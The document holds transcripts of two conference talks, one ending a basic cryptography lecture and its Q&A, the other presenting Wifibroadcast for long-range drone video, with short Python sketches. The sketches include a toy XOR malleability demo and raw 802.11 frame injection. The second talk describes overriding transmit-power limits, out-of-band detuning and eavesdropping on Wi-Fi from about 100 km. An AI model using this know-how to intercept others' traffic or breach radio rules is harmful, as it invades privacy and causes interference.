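Before the detailed walk-through of that email path, here is what using TLS looks like from a program's point of view, as a rough sketch: the ssl module performs the handshake, checks the server's certificate chain against the system's trusted certificate authorities, and then encrypts and authenticates all traffic on the socket. The host name is only an example.

```python
# Establishing a TLS connection: handshake, certificate check against the
# system's trusted CAs, then an encrypted and authenticated socket.
import socket
import ssl

hostname = "example.org"
context = ssl.create_default_context()   # loads the trusted CA certificates

with socket.create_connection((hostname, 443)) as sock:
    with context.wrap_socket(sock, server_hostname=hostname) as tls:
        print(tls.version())                    # e.g. "TLSv1.3"
        print(tls.getpeercert()["subject"])     # whom the certificate names
```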
However, the server cannot remove the second layer of encryption, right? So the email is encrypted two times. One time was with Bob's key, and a second time so that the server can decrypt it. And now the server can remove the second encryption, but the first one is still there. So Alice's server cannot read the email. And then the process repeats. The already encrypted message is encrypted a second time and decrypted again at Bob's server. And then when it is downloaded by Bob, it is encrypted again and decrypted again. And then finally, Bob, who has the secret key, the secret decryption key, can remove the inner layer of encryption. And so Bob can read the message. However, the servers in between cannot read the message just because it is still encrypted with Bob's public key. Okay. So with that, I would like to wrap up. Sorry. So I would like to wrap up. So here are a couple of take home messages. So the first one is encryption conceals the content of data. And that's pretty much all it does. It does not conceal the metadata and it does not prevent the message that is being sent from being changed. That is the job of authentication. Authentication enables the detection of changes to data. And both for encryption and for authentication, you need to have pre-shared keys or maybe not really pre-shared keys, but key distribution has to happen beforehand. And one way to make this problem of key distribution simpler is with certificates. So certificates confirm that a specific public key is owned by a specific entity. But if you have all these things, encryption and authentication and certificates, you can build a network protocol which takes care of securely transmitting a message from one place to another. And you can apply that to get transport encryption. But transport encryption is inferior to end-to-end encryption in the sense that with transport encryption, all the intermediaries can still read the email or the message being sent, however with end-to-end encryption, they cannot. And with that, I'd like to close and I will be happy to answer your questions. If there are any questions which you cannot ask today, you can send me an email at this email address on the slides. I will try to keep that email address open for one or two years. Thank you for your talk. And now we would come to the question parts. If you have any question, you can come up to microphones in the middle of the rows. Are there any questions from the internet? We have plenty of time if anyone comes up with a question you're invited. We have a question on microphone too, please. Hi. Thanks for your good talk. And I would like to know how can you change a message that was properly decrypted without the other receiving part noticing that the decryption doesn't work anymore? That depends on the encryption scheme that you're using. But for quite a number of encryption schemes, changing the message is actually quite simple. So there is a really large number of encryption schemes which just work by changing a couple of bits. So the message is made up of bits. And your encryption scheme gives you a way to determine which of the bits to change and which not to change. So when you're encrypting, you use the encryption scheme to figure out which bits must be flipped. So change from 0 to 1 or from 1 to 0. And you just apply this bit change to the message that is being sent. And then the receiver can just undo this change to recover the original message, whereas an attacker who does not know which bits have been flipped cannot. 
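The bit-flipping answer above can be made concrete with a toy XOR "stream cipher": the attacker cannot read the plaintext, but flipping a ciphertext bit flips exactly the same bit of what Bob decrypts. This is not a scheme anyone should deploy; it only demonstrates malleability, and the keystream and message are made up.

```python
# Toy XOR stream cipher illustrating malleability (do not use as a cipher).
import os

def xor(data, keystream):
    return bytes(d ^ k for d, k in zip(data, keystream))

keystream = os.urandom(16)                 # shared between Alice and Bob
plaintext = b"PAY 100 EUR     "
ciphertext = xor(plaintext, keystream)     # Alice encrypts

tampered = bytearray(ciphertext)
tampered[4] ^= ord("1") ^ ord("9")         # attacker flips bits blindly

print(xor(bytes(tampered), keystream))     # Bob decrypts: b'PAY 900 EUR     '
```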
However, so still the attacker can just flip a couple of the bits. And in this case, so say the bit has been flipped by Alice and it is being flipped another time by the attacker. So the bit is at its original value again. And then Bob, who knows how to decrypt, will flip another time so it's changed again. And thus the message has been changed. And there's a couple of things you can do with this kind of changes to the messages. So the decryption simply does not fail. It just maybe outputs the wrong message. OK. Next question from microphone 6, please. You stated that encryption does not cover metadata. Are there any thoughts about that? Any thoughts? Yeah. Any solution for maybe encrypting metadata? I don't know. So much of this is pretty hard to come by. So I mean, for emails, there is the idea of also encrypting the subject, which is usually not encrypted. However, so if you want to hide the length of the message, what you can do is simply pad the message. So just random garbage at the end of it to kind of hide how long it is exactly. So the attacker will still have an upper bound on your message length. But it does not. So it knows that the message you're sending is at most as long as the ciphertext you're sending, but it does know maybe it's shorter. So if you want to hide your identity while communicating, you should be going for something like Tor where you're not connecting directly to the person you want to communicate with, but via a couple of intermediaries in a way that none of the intermediaries know both you and the final recipient. Thank you. Okay. Then I believe we had a question from the internet. Yes. The internet is asking, can you say anything about the additional power consumption of the encryption layers on a global scale? Sadly, I think I cannot. So I do not exactly know how much power consumption is caused by the encryption. However, so in terms of computation, at least symmetric encryption is quite cheap in the sense that it takes a couple of processor circuits to decrypt, I don't know, 16 blocks or something. So you can usually decrypt hundreds of megabytes per second with a processor, at least with a modern one. So I don't know any numbers. But I mean, you can guess that if everyone in the first world countries is using encryption, then in the sum, there is a pretty large amount of energy going into it. Next question, microphone two, please. You mentioned a couple of times that an attacker might be able to replay a message. I haven't really understood if I'm an attacker. How does this benefit me that I am able to do that? So imagine if Alice is sending an order to her bank to transfer some money, and every time the bank is receiving such an order, it will initiate the bank transfer, then as an attacker, that would be pretty cool to exploit because you once eavesdrop on Alice sending such an order to the bank, and then later on, you can just repeat the same order to the bank and more money will be sent. So if you were the recipient, that would be pretty cool, and you could just deplete Alice's bank account. Then question from microphone three. I was in the talk about elliptic curves and cryptography, and I'm wondering where this would be applied now in your example or in your process you showed us. Let me maybe just go to another slide. So typically, encryption is applied or elliptic curves are applied within these encryption and decryption boxes. 
So there is a lot of mathematics going on in these computations, which I did not explain because I wanted to keep this talk accessible to a broad audience, but one way to realize such an encryption procedure is by using elliptic curves within these boxes. Microphone one, please. Another limitation I could think of or how to overcome this is devices like IoT devices that have low power and limited processing capability. So how do you adapt this complex encryption-decryption computation for these devices? There is some research going on on encryption schemes that are particularly lightweight, so particularly suited for resource constrained devices. But as far as I know, pretty much all of them have some weaknesses that came out of them, so security-wise they do not offer the same guarantees as the ones that you use if you have the resources for it. On microphone two, please. Yeah. Hi. You mentioned the enormous power that certificate authorities have in the picture of certificate and authentication. I was wondering what are the possible solutions or the proposed solutions at the moment? What is the state of the art on solving that problem? So one solution that is currently being pushed is called certificate transparency, and that works by basically creating a public or lots of public log files where each certificate that is ever created must be added to the log file. And so if you're Google.com or if you're Google and you see someone entering Google certificate into the log file and you know that you didn't ask for the certificate, then you know that there is a fake certificate out there. And so whenever you get a certificate, you are expected to check if the certificate is actually contained in one of the public log files. Does that answer the question? Yes, but how does appending a certificate would work? So for example, making sure that a certificate is recognized as legitimate. Okay. So the idea is whenever you get a certificate, it will be put in a log file and everyone who gets the certificate is expected to check that the log file is actually there. So is the certificate authority that also pushes the certificate to the log? That's how it's expected to work, yes. Okay, thank you. You're welcome. Then we have one more question from the Internet. The Internet wants to know, can we or where can we get an authentication for a PGP key and how to apply it on a key afterwards? Is there a possibility somehow? I guess that depends. So with PGP, the common model is that there is not central certification authority or a bunch of them, but so you have kind of a social graph of people who know each other and exchange emails and each of these users should authenticate the public keys of their peers. Okay, so when you want to communicate with someone who you do not already know, but who's maybe a friend of yours, then hopefully your friend will have authenticated the public key of his friend, and if you trust your friend, you can then check that your friend in fact has created a kind of certificate for his friend. Are there more questions from the Internet? One more, yes, please. I don't know if it's a question regarding your talk really, but someone wants to know, would you recommend start TLS or SSL TLS in email? So as far as I'm concerned, I would always opt for using encryption on the outermost layer. So first building a secure connection to your email server and then doing SMTP or whatever over that connection. 
So I think directly establishing the connection in a secure manner is a better way to do it than with STARTTLS. I believe that was it for questions. Please have a last round of applause for OZ.
This talk will explain the basic building blocks of cryptography in a manner that will (hopefully) be understandable by everyone. The talk will not require any understanding of maths or computer science. In particular, the talk will explain encryption, what it is and what it does, what it is not and what it doesn't do, and what other tools cryptography can offer. This talk will explain the basic building blocks of cryptography in a manner that will (hopefully) be understandable by everyone, in particular by a non-technical audience. The talk will not require any understanding of maths or computer science. This talk will cover the following topics: What is encryption and what does it do? What are the different kinds of encryption? What is authenticity? Are authenticity and encryption related? How can authenticity be achieved? What are certificates for? What is TLS and what does it do? While covering the above topics, I will not explain the technical details of common cryptographic schemes (like RSA, AES, HMAC and so on), in order to keep this talk accessible to a broad audience.
10.5446/53193 (DOI)
So, the next talk is held by Befi, he's already here and he is working in cartography. So, he's building maps with the help of cameras, but he also likes to repurpose things that he finds useful for other things. And that is also what he will be talking about in this talk here. It's about Wi-Fi broadcast. So, he will show you how to convert standard Wi-Fi dongles into digital broadcast transmitters. Give him a warm applause for his talk. Yeah, thank you very much. Today I would like to present to you my work on modifying Wi-Fi dongles to serve purposes that they are not intended for by the Wi-Fi standard. And yeah, one example would be digital broadcast transmitters, but I will also mention some other examples that you could use them for in the way I intended. So, coming to the contents, I will start with motivation because the obvious question is why would you even need to change something with Wi-Fi devices because we're using them all day, they're working quite well. This is true for the intended applications, but there are a class of applications in which the Wi-Fi standard, well, fails pretty much. And this is what we will be addressing in this talk. Then after the motivation example, I will show you the basic principle. And building on top of that, I will introduce some improvements that I introduced to make such a broadcast transmission really bulletproof. And finally, I will give you some usage examples to show that it's really easy to use and also give you some real video footage that has been transmitted using this broadcasting scheme. So, coming to the motivation. So my personal motivation and a rather good example of an application for this technique is if you would want to build a free open source first person view drone. So this is any type of drone I just depicted here, quadcopter, could be a land based drone, doesn't matter. The important part is that this drone has a camera attached to it and it live streams the video down to the operator of the drone. And the operator flies this drone only by looking at this live stream. So there's no direct line of sight to the drone. So reliability is really important here in this application. And I imagine all of you have an idea how you would realize such a system. And actually, on first glance, it's pretty straightforward. Like you would just add some Wi-Fi hardware to the drone. You would create an access point with this Wi-Fi hardware. And then on the ground, you have laptop and you connect to that access point. Really simple. And then from the drone, you would send down the data, video data, simply by UDP packets. And this looks fairly decent, right? Should work. And if you test it at home, then you will probably notice that it works really well. And then you go outside, start flying, having the time of your life, and suddenly, oops, you lost association. And this means, of course, you as an operator, you're instantly blindfolded. And good luck trying to rescue your drone in that situation. Well, you might think maybe it's not so bad. Wi-Fi usually automatically reconnects. And this is true. This might help you. Might not help you. So yeah, good thing about this is you can directly go shopping parts for a second drone because your first drone will have already crashed by now. So in summary, association or stateful connection is something you do not really want in this application. So that's a problem of standard Wi-Fi because standard Wi-Fi usually uses associations. That's another problem I'm coming to right now. 
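To make the naive setup just described concrete, here is a rough sketch of the drone side pushing video data as UDP datagrams to the ground station over an ordinary Wi-Fi association; the address and the data source are placeholders. This is exactly the approach that breaks down the moment the association is lost.

```python
# Sketch of the naive FPV link: video chunks sent as UDP datagrams over a
# normal Wi-Fi association. Address and input source are placeholders.
import socket

GROUND_STATION = ("192.168.4.1", 5600)   # placeholder laptop address

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with open("/dev/stdin", "rb") as video:   # e.g. a piped H.264 stream (Linux)
    while True:
        chunk = video.read(1400)          # stay under a typical MTU
        if not chunk:
            break
        sock.sendto(chunk, GROUND_STATION)
# Works fine at home -- until the association drops and the feed goes dark.
```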
So I wrote here that we are using UDP packets. And this seems to be a smart choice because it's unidirectional: you just send data from the drone to the ground station and avoid all the hiccups of, let's say, stream-oriented protocols like TCP, where data could queue up and you need to send acknowledgments up to the drone, which is, of course, not really something you would want to do. So UDP seems to be a good choice. But in fact, it's not, because under the hood, on the network layer it seems to be fine, but on the MAC layer of Wi-Fi there will still be data flowing from the ground to the drone in the form of acknowledgments. So Wi-Fi uses acknowledgments, and so you actually need to acknowledge the packets from the drone, and so you have a required upstream from the ground to the drone. And this is obviously something you would not want to have, because then you rely on two links working perfectly just to get the data from the drone down to the operator. And there's another disadvantage of this bidirectionality, which is actually the core of the problem: you ideally want to have asymmetrical setups. So what would you do to increase the range of the setup? You would, for example, install a power amplifier on the drone side so that the signal reaches further. But with standard Wi-Fi, you would need to have the same power transmitter also on the ground station, which is, again, pretty pointless. And so bidirectionality is a problem with standard Wi-Fi. There are a couple of other things. Wi-Fi has some automatic control mechanisms, like, for example, transmission rate control. If the two devices are at a certain distance, the received signal strength, of course, drops at the receiver, and this triggers a mechanism that throttles or dials down the transmission data rate on the transmitting side. And this happens automatically; this is not under your control. So imagine you are trying to send a 10 megabits per second video signal, and suddenly the card decides to just switch to 5 megabits per second. The result will be that data queues up on the drone, latency increases, you crash. Same problem. There's also automatic power control, which makes sense in standard Wi-Fi because you want to limit the interference between close-by networks, so you just send with, let's say, the minimum required amount of energy. But since you rely so much in this application on this link fully working at any time, you do not really want to have that; you want to always use maximum power in that case. And lastly, you have no signal degradation in standard Wi-Fi. Standard Wi-Fi uses CRC checksums and either delivers a packet with a matching checksum or no packet at all. And this is a problem, because let's just assume you fly further and further away from the ground station: at a certain point, the video feed will just stop because the CRC checksums turn bad. And this is actually almost a crash guarantee again, because you have no warning up front. It's just like, and it's off. And actually what you want is to see the transmission errors. This gives you a good hint that it's maybe time to turn around, and then you still have enough visual feedback to actually control the drone to move around. So signal degradation, again, is not possible in standard Wi-Fi. And yeah, this is kind of the motivation for me to flip things upside down a bit. And now we are coming to the basic principle. It's actually quite simple.
So you know, in standard Wi-Fi you have the device classes: an access point, which you connect to, and a station, a device that connects to this access point. And in Wi-Fi broadcast, the modes in which the devices work have been renamed by me: they are simply a transmitter and a receiver. And the hardware used for that is just plain standard Wi-Fi dongles, 8 euros per piece, so it's pretty cheap. And from these mode names, you can already infer that it's a truly unidirectional data flow from transmitter to receiver. These devices work in injection mode in the transmitter case; basically, with that mode you can send arbitrarily shaped packets into the air without any association. And the receiver runs in monitor mode, meaning it will pick up all the packets that are floating around in the air. And with an appropriate filter on the receiver side, you just get the packets from your transmitter. And this already establishes a very primitive but surprisingly well-working link that does not share all the problems of standard Wi-Fi that I mentioned on the previous slide. In theory, this is super easy to do. The APIs for these special modes, like injection mode and monitor mode, are there already. You can just use them, implement it in a couple of lines, and you should be good to go. In reality, the injection side is quite a bit more complicated than anticipated, because we're basically leaving the domain of standardized Wi-Fi here and are, well, operating somewhere outside of the standardized domain. And you have no guarantees how the hardware will react in this non-standardized mode. So one problem I discovered was a low injection rate. Many chipsets I tested really had terrible injection rates; in some cases, in the order of only 1% of the air data rate could get through. So this was pretty bad. I solved this by just selecting good chipsets, in a way. Then many of the drivers and firmwares I tested ignored quite crucial parameters that I requested them to obey. So for example, TX power: I found many adapters ignoring this setting and just sending at a low, minimal power value, which is, of course, not what we want. But a simple, dirty kernel driver patch — don't look at the actual lines, it's just a couple of lines — fixed that for me. More importantly, some devices ignored data rate requests. So I requested to send a packet at, I don't know, 54 megabits per second, and these drivers were always sending the packet at 1 megabit per second, which is not enough for video, for example. Luckily, there is one specific Wi-Fi dongle, which I showed in the pictures earlier, that has open source firmware. So I can just download that firmware, compile it, flash it onto the Wi-Fi card, and actually, again, to get control over the data rate, it was just a one-line change in the firmware, and I could specify exactly the transmission parameters that I needed for my project. Now with all the troubles fixed, so to say, we are back at this basic scheme, and this works quite well already. If you install this on your drone, there's no problem flying around a couple of hundred meters with such a setup without any special ingredients like amplifiers, big antennas, and so forth. But my initial motivation for this project was more to explore the world from the bird's perspective, so a couple of hundred meters didn't really cut it. So I wanted to increase the possible range by any means.
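To give a feel for what raw injection without any association looks like in code, here is a rough Scapy-based sketch; the interface name, addresses and frame layout are illustrative only and are not the actual wifibroadcast packet format. It assumes the interface is already in monitor mode and that the script runs with root privileges.

```python
# Rough sketch of raw 802.11 frame injection on a monitor-mode interface
# using Scapy (third-party package, needs root). Frame layout is invented.
from scapy.all import RadioTap, Dot11, Dot11QoS, Raw, sendp

IFACE = "wlan0mon"                      # interface already in monitor mode

frame = (RadioTap()
         / Dot11(type=2, subtype=8,     # QoS data frame
                 addr1="ff:ff:ff:ff:ff:ff",   # broadcast: no association
                 addr2="de:ad:be:ef:00:01",
                 addr3="de:ad:be:ef:00:01")
         / Dot11QoS()
         / Raw(load=b"video payload chunk"))

sendp(frame, iface=IFACE, count=10, inter=0.01, verbose=False)
```

On the receiving side, the same library (or libpcap directly) can sniff in monitor mode and filter on the chosen transmitter address.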
One of these means is to just add more of these cheap dongles on the receiver side. You can just plug them in, and this enables you to do software diversity. At first glance, you might think, well, this does not look really helpful: we have three receivers that receive the same data stream from the transmitter, so we will only have three copies of the same data at hand. What should we do with that? In reality, this actually helps quite a bit, and the reason is that in reality you have multipath interference. So starting from this oversimplified transmission scheme — you will never encounter such a transmission here on Earth, maybe in space. But here on Earth, you have other objects that cause reflections of the signal, and these reflections interfere at the receiver side, either constructively or destructively. And it's simply pure chance whether you get constructive or destructive interference. By placing several receivers at different locations, you can basically twist the shape of this triangle here a bit, and this gives you a better chance that at least one of the receivers will not suffer from destructive interference. And actually, in reality, this really helps a lot. There are other use cases of software diversity. For example, you could use it to realize antenna diversity. Typically, if you look at these black antennas here, these are omnidirectional antennas giving you 360 degrees of coverage. This is already a good starting point, but with antenna diversity you can add different antennas to different receivers. So for example, you could add, next to the 360-degrees antenna, a very high-gain, long-range directional antenna if you know, well, I'm just flying in that direction, long range. You can just combine the antennas depending on your needs. And if you invest a bit more, you can use lots of directional long-range antennas and realize, well, let's say, an antenna that's really not feasible to build with just antenna design or electronic means, so to say. A third use case is, of course, that you can increase spatial coverage. There are situations like this top-down view scenario where you have occlusions which the transmitted signals cannot pass, and in that case, you can simply place several receivers at different locations. The software will automatically fuse the signals from these receivers so that in the end you get only one logical data stream, which handles all the handover from one stick to another automatically. Let me quickly explain to you how this works. It's quite simple. We have here an example with three cards and four packets. These arrive, of course, consecutively. And let's just imagine, yeah, card zero received packet zero with a CRC error. So something is wrong; we don't know exactly how much — at least one bit seems to be flipped — it could be not really severe, it could be really severe, we don't know. But the other cards received good packets, so we just pick one of the two green ones, we're fine, and have received a good packet here. Packet one might be good on card zero, have a CRC error on card one, for example, and be completely missing on card two. In that case, of course, it's an easy choice: we pick the green one, which is fine, and we have a good packet in the end. Now packet two might have a CRC error, be completely missing, and again have a CRC error. So what would we do here?
Well, it's a tough choice, but the best thing we could do is to pick one of the packets with a CSE error. Maybe preferably the packet with the higher received signal strength. But besides that, there's not much more we could do. And packet three might be missing on all of the cards. And this typically happens when you have some external interference, like someone switches on the light, creates a spark, and this destroys the reception on all of your receivers. And again, there's nothing we can do about that. Now taking this combined stream of packets, this is, of course, not satisfactory. So this is still better than one card, but there are still some artifacts. And how could we deal with these? Well, simply by adding forward error correction to the data. And the way I implemented it is actually quite straightforward. So to these payload data packets, I simply add forward error correction packets, two or more. It's configurable depending on your needs and on your link quality. And of course, now for the first two packets, there's nothing to be done. They are good already. And now we are dealing with the broken packages. And we start with the worst case, which is the missing packet. We have no data at all here, so we can or we should start with that one. And so we apply the first FEC packet to the missing packet. And you can think of these FEC packets as, well, joker cards, so to say. So we can recalculate one of the data packets by using this FEC packet. So this one is used up. And from that, we could reprocess the original value of this packet. And of course, we will then do the same thing with packet two. And now we have a good data stream again. Of course, this is now the optimal example. In reality, you sometimes have situations where you used up all FEC packets before you repaired all data packets. That can happen. If that happens too often, you should just dial up the number of FEC packages. And you should be good again. All right. So this was the basic principle. And now I'd just like to show you some usage examples of the tools that I developed that realizes this transfer mode. So first, a bit artificial example is a simple file transfer. So we first start the receiver because we want to capture all packages from the transceiver and not start in the middle. And this simply works by starting this RX program. This is part of the Wi-Fi broadcast software. And you just specify the Wi-Fi adapter that it should use. And in case of software diversity, you would just list several adapters and it would automatically do the software diversity under the hood. And what this does is basically all the data it receives, it will output on the STD out. And you can pipe this into ImageMagics display program. On the transmitter side, it's the same in verse. So you just output something to STD out file, in this case, a GIF file of your new drone. And you pipe that into the TX program of Wi-Fi broadcast. And as soon as you execute this command, it will be sent out into the air and picked up by the receiver and subsequently displayed by ImageMagic. So pretty simple, but like I said, artificial setup. This is now an actual example that I'm using, for example, on my drone to transmit the video. So as a PC, I'm using a Raspberry Pi just sitting on the drone and I start this command. So this looks a bit more complicated, but it's actually fairly simple. So the first part of this, from here to the pipe, is simply a standard Raspberry Pi tool that outputs H264 compressed video data on STD out. 
And again, you pipe that into the TX program and it will immediately be sent out into the air. There's no need to have any receiver enabled. It will just be emitted in the air. There's another alternative. So if you do not want to use Raspberry Pi, you could simply use a GStreamer API call, which is pretty much the same thing. So you capture from a video for Linux device, compress it to H264, and then output it to a standard output and pipe that into the TX program. On the receiving end, you can do, again, the same in reverse. You use the RX program, pipe that into GStreamer pipeline, and display that image onto your screen. So it's already a setup that is able to fly for you pretty well. Now Wi-Fi broadcast is actually agnostic to the data transport. So it's just you pipe data in and it falls out on the other side of the channel, so to say. And on its own, it's not very useful. And therefore, I developed some components that kind of complete the drone application. And one thing is, for example, I created the Raspberry Pi image that you can simply burn onto 2 SD cards. You put these into your RX and TX Raspberry Pi and switch them on and you have a video link running. So that's quite nice. And on the RX side, you have also support for recording. So if you just add a USB stick to the Raspberry Pi, you will automatically record the video of that transmission. I also developed OSD, stands for on-screen display. It's an overlay onto the video that shows some telemetry information of the drone, like battery status and so forth. And I also ported everything to Android. This was a bit more complicated than anticipated. Just to give you some impressions. So this is what you could mount onto your drone, Raspberry Pi Zero, pretty small device, weighs only a couple of grams. And you get the camera already for Raspberry Pi foundation with it. And yeah, that's a pretty good drone setup that works even on the tiny drones. On the RX side, so this is now my clumsy self-made setup. On the left, you see my video goggles that are cut out of some foam piece. In the middle is the blue thing, the battery. And on the right, the gray box. It's a Raspberry Pi. And the white thing is, of course, the Wi-Fi receiver. And this was quite a nice setup. So I have the components in the pockets of my jacket, goggles on my head. And this is enough to fly around. This is an example of the OSD display. Here you see basically everything that might help you to safely get your drone back home, like receive signal strength, battery status, artificial horizon, distance to your home, and so forth. And we will see other examples of this in a second. This is a self-captured screenshot of my Android port. So the Wi-Fi broadcast camera looks onto the tablet and the tablet shot the screenshot. And so you see this gives this nice recursive tunnel. Again, Wi-Fi dongle connected to the Android device. And this was quite a bit nastier than expected because I needed to recompile the Android kernel because it didn't support, of course, the Wi-Fi dongle. And I needed to run Wi-Fi broadcast in a change route environment, pipe that into NetCAD, which sends UDP packets to a local port. And then on the Android side, I had an app that receives data from the local port, decodes the H.264, and displays it on the screen. So it's not exactly user-friendly, but it works. So as a conclusion of my talk, I would like to show you a recording of a long-range video transmission. It hasn't been done by me, but it's another crazy dude, I would say. 
So what you see here is, again, the OSD display. And the video in the background is actually recorded on the ground. So this is the actual live footage that the drone pilot will see and use to control his drone. And, yeah, so this is a fixed-wing drone. You see here it accelerates to takeoff. And now we're in the air. And in a couple of seconds, we should see the antenna of the drone, which is nothing special. It's just here with this gray stick, which is a standard omnidirectional antenna. And now if you take a look here at the bottom, this here is the distance to the operator. And as you can see, it's crystal clear video, in this case, I think it's 720p. And this is really quite a nice visual input for you to control your drone. Yeah, all right. I think I will let this running during the Q&A session. Thank you very much. And I'm happy to take your questions. Quite impressive indeed. So thank you very much, Bifi. Questions please to the microphones. We have one, two, and three. So come to the microphones. And we have a question on the internet too, but we start with microphone two. Hi. Thank you for your talk. You said that there would be graceful signal degradation, but can you also display the connection quality, for example, by how many FEC packets did I have to use? I'm not doing that one, but there's something similar. Like if you look here up, the first number is the number of data blocks that could not be recovered fully by FEC packets. So yeah, I'm just wondering why this here isn't increasing. But yeah, so this gives you already quite a good indication, but I think your suggestion is also a good idea because it was triggered earlier than this one. So yeah, that would be certainly helpful. Okay. Thanks. So maybe the question from the internet, please. There's a practical question. What is the name of the Wi-Fi dongle you used? So I used this. Let me switch back to the picture here. So this white thing here is called TL-WN722N. If you buy this one, make sure to get the first revision because the later revisions redesigned the whole interior thing of the dongle and use a different chip. Microphone 1, please. I'm totally blown away by the kind of range that you get there because the implication is that with essentially consumer hardware, if you go into the air, you could eavesdrop wise lands over 100 kilometers. Is that what you're saying? Well, the setup is asymmetrical. So the standard antenna that you saw in the beginning of the video that wouldn't have a 100 kilometer range. It's an omnidirectional antenna. And this one is observed on the ground with a high gain directional antenna. So it would only work if you would install this high gain directional antenna on the aircraft. But in that case, you're totally right. You could observe Wi-Fi lands from 100 kilometers, probably. All right. Number three, please. I'd like to know which technology used to filter the packets from the receiver side. So you might sniff everything once you are in the monitor mode. And I'd like to know what you are using to filter them, only the one from the video. That's BPF. So the packets I'm using have, well, especially crafted MAC address. And I'm just applying a BPF onto that. And this will do the trick. And yeah, there's also support. So for example, the telemetry is also sent, of course, with Wi-Fi broadcast. And Wi-Fi broadcast has a concept of ports to have several streams in parallel. And there again, BPF filters used to separate these streams. All right. Number two, please. OK. Hello. 
So one of the biggest implications in FPV flying, like the biggest deals for extreme or quick flying is the delay you get on the video. So how does your digital video really clear and sharp vision compared to the analog FPV we have for many years? So what's the difference? Because I assume it's bigger. It is indeed. So I have an example here. This is what you get from analog FPV quality-wise. Latency-wise, this is, I think, roughly 40 milliseconds. Wi-Fi broadcast is with the Raspberry Pi in the 100 millisecond range. So it's quite a bit slower than analog. But actually, Wi-Fi broadcast is not the cause of that. It's more the video compression. So Raspberry Pi uses, let's say, frame-based triggering. Like you receive an image from the camera, and only once it's completely there, subsequent steps will be triggered. And ideally, you would kind of more pipeline the processing. Like you start already when the first pixels arrive to process them. Unfortunately, with Raspberry Pi, this is not possible. Because the video compression is closed source, which is a bummer. And to this date, I have not yet found a better alternative that gives slower latency. I looked around quite a bit, and the only thing that would give better latency would be custom hardware, like in the sense of where you have full control, like an FPGA thing. But I decided not to use this because Wi-Fi broadcast should be approachable. Like you should just go by an online shop of your choice, cheap components, assemble everything, and you're good to go. And FPGAs are too special for that domain. Okay, thank you. And another question you've shown on the slide, the Raspberry Zero W. So you said it's only the Raspberry and the camera, but I assume you're not using the built-in Broadcom Wi-Fi chip. You're using the Tepiling, right? Correct. Thank you. Okay, next question, number two. Okay, yeah. Thanks for the great talk. I also recognized the USB Wi-Fi dongle, I have one myself. And I was thinking, is the Atheros chip, the first hardware revision still manufactured, or are there just rests to be purchased? Actually I haven't bought them for a while, so I don't know how, if they are still, you can still get them. Because if you go to a shop now or you don't get this device anymore. Okay, there are some other alternatives. So for example, in the five gigahertz range, you can also use other chips. There's a link on my blog, it's linked to this talk if you're interested in that. And actually it's worth mentioning, if you're intent to use this for drone applications, there are three or four forks of Wi-Fi broadcast already that just extended the scope of functionality by orders of magnitude. So you should also check out definitely these forks, they are pretty well. Thank you. Okay. Next one. Yes, thank you for your talk. It was impressive to get a clear video signal for 10 kilometers, but one question is how do you control the drone? Is there another direction of your communication that interests me? So you can use Wi-Fi broadcast for that as well, so you can run both the RX and TX instance of Wi-Fi broadcast on the same dongle in parallel, that works. But I personally am a big fan of having the highest possible reliability on the control channel. So for that, I use frequency hopping transmitters like you can buy for RC, from RC vendors, and these are really almost indestructible. 
They interfere with the transmission sometimes, but there are ways around this, but yeah, highest reliability for control and then a bit below that for video feedback. That's just my personal gut feeling. Okay, thank you. Thanks. And now our last question. Hi, regarding the error correction, you've shown that if you use one of the error correction packets, you can use it to restore a broken one or even a missing one. Now taking you have two broken ones, did you check it would be feasible to use these both and apply statistics to check if you can reconstruct it? So you mean I have two broken, meaning bad CRC packets and two FAC packets? And basically if you can use the ones with the broken CRC and don't use the forward error correction ones. Okay, no, I didn't do that. So sorry, I have no word for that. Okay, thank you. Thanks. Okay, another last question. Okay, so here's the last one. With traditional analog video, you have the possibility of choosing a channel that you want to transmit on so multiple people could fly at the same time. You mentioned before that in Viper broadcast, there's this notion of ports to separate different streams. How many ports could you currently support? Like how many drones in the air that can independently stream are supported? And is there the possibility of having more or less ports if you limit bandwidth? So indeed, if you limit bandwidth, you can transmit more in parallel. I wouldn't recommend to use ports to fly drones in parallel because one of the drones might not play nicely and use up more bandwidths and then you have a problem. So I would rather recommend to use Wi-Fi channels to separate these. And actually the white Wi-Fi dongle I've shown is quite capable. You can even detune it to transmit in 2.3 gigahertz. You shouldn't do that, but you can do it. Okay, thank you. Okay, thank you, Vefi, and a warm applause for you again. Thank you.
This talk is about modifying cheap wifi dongles to realize true unidirectional broadcast transmissions that can transport digital data like HD drone video with guaranteed latency over a range of tens of kilometers. The talk will show the necessary changes to the firmware and kernel of the wifi dongle, the forward error correction and software diversity (fuse several receivers in software) that is added to improve reliability and the most prominent use case: Flying a remote controlled drone at a distance of tens of kilometers. Wifi as it is implemented in the 802.11 standard tries (as best as it can) to guarantee to a user the delivery of data and the correctness of the data. To increase the chance of delivery, the standard includes techniques like automatic retransmission, automatic rate reduction, CSMA/CA. To guarantee correctness, the packets are using CRC sums. These measures are very useful in a typical 1-to-1 communication scenario. However, they do not adapt very well to a 1-to-n scheme (broadcast). Even in case of a 1-to-1 scenario the techniques mentioned above make it impossible to guarantee a latency and throughput of a transmission. Wifibroadcast uses the wifi hardware in a mode that is very similar to the classic analog broadcast transmitters. Data will immediately be sent over the air, without any association of devices, retransmissions and rate reductions. The data can be picked up by an arbitrary number of receivers that decode the data stream, repair damaged packages via software diversity and repair damaged bits via forward error correction. The Wifibroadcast software is an easy to use Linux program into which arbitrary data can be piped. The same data will then appear on the receiving program on standard output and can thus be piped into further programs. All software developed has been made available under the GPL license. A prominent use case for Wifibroadcast is the transmission of live video from a drone. Compared to standard wifi this offers the following advantages: * Guaranteed latency * No association (that might get lost) * Multiple receivers work out of the box * True unidirectional communication allows to use asymmetrical antenna setups * Slow breakup of connection instead of complete communication loss The talk will show the details of the Wifibroadcast protocol, the changes to the firmware & driver, the forward error correction, software diversity and finally will show the HD video transmission over tens of kilometers as an application example.
10.5446/53191 (DOI)
